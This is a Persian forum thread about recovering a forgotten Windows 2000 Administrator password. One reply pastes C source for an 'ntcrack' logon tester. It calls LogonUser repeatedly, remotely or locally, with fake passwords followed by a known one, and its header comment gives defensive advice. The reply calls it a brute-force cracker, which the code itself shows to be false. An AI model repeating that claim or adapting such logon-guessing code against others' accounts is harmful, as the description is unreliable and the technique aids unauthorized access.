نمایش نتایج 1 تا 7 از 7

نام تاپیک: بازیابی رمز عبور در ویندوز 2000

  1. #1
    کاربر دائمی آواتار komeil64
    تاریخ عضویت
    بهمن 1381
    محل زندگی
    تهران
    سن
    38
    پست
    618

    بازیابی رمز عبور در ویندوز 2000

    سلام
    من پسورد Administrator ویندوزم (2000)را فراموش کردم
    چه طوری وارد ویندوز بشم یا پسورد را پیدا کنم؟ :cry:

  2. #2
    کاربر دائمی
    تاریخ عضویت
    فروردین 1382
    محل زندگی
    تهرانسر_ فاز5
    پست
    317

    سلام

    ببین معمولا نمی شه ولی اگه قسمت میهمانتو فعال باشه با اون وارد شو
    راستی از کدوم هنرستانی

  3. #3
    کاربر دائمی
    تاریخ عضویت
    بهمن 1381
    محل زندگی
    ایران - تهران
    پست
    2,342
    من یک برنامه برای اینکار دارم ! از روش brute force attack استفاده می کنه ! یعنی اینکه با آی دی و پسورد یک یوزر معمولی وارد می شی ( اگر نداری که شرمنده شرمنده!! ) . حالا پس از وارد شدن می دونی که آی دی مدیر چیه ؟ :wink: برنامه را اجرا می کنی و پس از چند ساعت یا روز !! می تونی پسورد را پیدا کنی ! اگر شانست خوب باشه چند دقیقه بیشتر طول نمی کشه ! هیچ راه دیگری هم ندارد! خیالت تخت تخت باشه !! ( اگر پیدا نشد باید ویندوز را پاک کنی !! )



    // Example of "CRACK" type program for NT that could be used over the Internet
    // to attempt logging in as Administrator using a database of passwords, until
    // a password was found that worked. To prevent such attacks, be sure to disable
    // SMB networking via TCP/IP protocol (using firewalls or by manipulating NT
    // bindings) and/or periodically examine security event logs for such attacks.


    #pragma warning(disable:4201 4214)
    #define WIN32_LEAN_AND_MEAN
    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #pragma hdrstop
    #pragma warning(default:4201 4214)

    void main(int argc, char *argv[])
    {
    BOOL frc;
    int retcode = 1;
    DWORD start, stop;
    DWORD rc;
    char buf[4096];
    int loop;
    int failcount = 0;
    BOOL fDebug = FALSE;
    char *RemoteName = NULL;
    char *RemoteIPString = NULL;
    char *UserName = NULL;
    char *GoodPassword = NULL;
    char password[17];
    HANDLE hToken;

    //
    // process parameters)
    //
    while(argc-- > 1) {
    switch(argv[argc][1]) {
    case 'n': RemoteName = &argv[argc][3]; break;
    case 'u': UserName = &argv[argc][3]; break;
    case 'p': GoodPassword = &argv[argc][3]; break;
    case 'c': failcount = atoi(&argv[argc][3]); break;
    case 'd': fDebug = TRUE; break;
    default : goto usage;
    }
    }
    if (!UserName || !GoodPassword)
    goto usage;
    if (RemoteName)
    printf("RemoteName=%s ", RemoteName);
    printf("User=%s PassWord=%s FailCount=%d Debug=%s\n",
    UserName, GoodPassword, failcount, (fDebug ? "True" : "False"));

    //
    // main loop
    //
    start = GetTickCount();
    for (loop = 0; loop <= failcount; loop++) {
    sprintf(password, "BADPSWD%d", loop);
    if (loop == failcount) {
    stop = GetTickCount();
    if (failcount > 0)
    printf("\n%d failed attempts in %lu ms\n", failcount, stop - start);
    strcpy(password, GoodPassword); // test a good UserName/password combo
    }
    frc = LogonUser(UserName,
    RemoteName,
    password,
    LOGON32_LOGON_INTERACTIVE,
    LOGON32_PROVIDER_DEFAULT,
    &hToken);
    if (frc == TRUE) {
    CloseHandle(hToken);
    printf("login succeeded, password=%s\n", password);
    retcode = 0;
    }
    else {
    if (fDebug) {
    rc = GetLastError();
    buf[0] = 0;
    FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,
    NULL,
    rc,
    0,
    buf,
    sizeof(buf),
    NULL);
    printf("login failed, password=%s rc=%lu %s\n", password, rc, buf);
    }
    else {
    if (loop > 0 && loop % 100 == 0)
    printf(".");
    }
    }
    }
    return;

    //
    // handle error
    //
    usage:
    printf("usage: ntcrack [/n=name] /u=user /p=password [/c=failcount] [/debug]\n");
    printf(" name : NetBios name of remote computer (uppercase)\n");
    printf(" default is local computer\n");
    printf(" user : User defined on remote computer\n");
    printf(" password : Password to test\n");
    printf(" failcount : Number of simulated failed logons\n");
    printf(" debug will cause verbose output\n");
    if (argc > 0)
    printf("bad arg=%s\n", argv[argc]);
    }



    کامپایل کردن آنرا هم که حتما بلدی !!

  4. #4
    آقای نصیری
    با عرض سلام
    اگر امکان دارد راجع به نحوه استفاده از برنامه خود توضیح بدهید.
    با تشکر

  5. #5
    کاربر دائمی
    تاریخ عضویت
    فروردین 1382
    محل زندگی
    Bürgermeister-Reuter Str. 34 - 28327 - D - Bremen
    پست
    177
    windows 2000 password recovery

    یک دیسک بوتر میسازه و ....

  6. #6
    با سلام
    آقای افشین پور
    می شه بفرمایید که این برنامه رو از کجا می تونم مجانی شو گیر بیارم؟ :shock: :?: :?:
    ممنون :gunfire:

  7. #7

    نقل قول: بازیابی رمز عبور در ویندوز 2000

    بهترین راه استفاده از cd Hiren ! همه کاراری میشه کرد ! حذف Password و........... !
    آچار فرانسه کامل !

تاپیک های مشابه

  1. بازیابی رمز عبور یا نام کاربری
    نوشته شده توسط ali_mnkt در بخش ASP.NET Web Forms
    پاسخ: 2
    آخرین پست: شنبه 08 مرداد 1390, 10:06 صبح
  2. حرفه ای: صفحه ثبت نام / ورود به سایت / بازیابی رمز عبور بصورت امن
    نوشته شده توسط ghiravani در بخش PHP
    پاسخ: 0
    آخرین پست: پنج شنبه 06 مرداد 1390, 14:04 عصر
  3. بازیابی رمز عبور
    نوشته شده توسط jaykob در بخش ASP.NET Web Forms
    پاسخ: 0
    آخرین پست: چهارشنبه 27 بهمن 1389, 21:55 عصر
  4. پاسخ: 7
    آخرین پست: یک شنبه 06 تیر 1389, 09:28 صبح
  5. رمز Admin ویندوز 2000
    نوشته شده توسط Behzad_Asharkhan در بخش امنیت در شبکه
    پاسخ: 1
    آخرین پست: شنبه 19 مهر 1382, 10:48 صبح

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •